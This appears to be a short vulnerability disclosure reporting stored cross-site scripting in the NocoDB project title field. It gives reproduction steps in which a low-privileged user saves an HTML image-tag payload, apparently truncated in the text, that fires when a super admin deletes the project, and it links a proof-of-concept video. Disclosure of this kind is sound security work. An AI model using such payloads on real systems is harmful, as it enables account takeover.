Description

The Project “Title” of the NocoDB application is vulnerable to stored xss which can leads to admin account takeover.

Proof of Concept

Login with low privileged users and Click on "New Project" then click on "Create"

Now write the payload <img src> and again click on "Create"

Then login from super admin account and "delete" the created project  <img src>

poc video

https://drive.google.com/file/d/1tVJFpajTWGOrgYvLj2eHfqcrLcWCSKnG/view?usp=sharing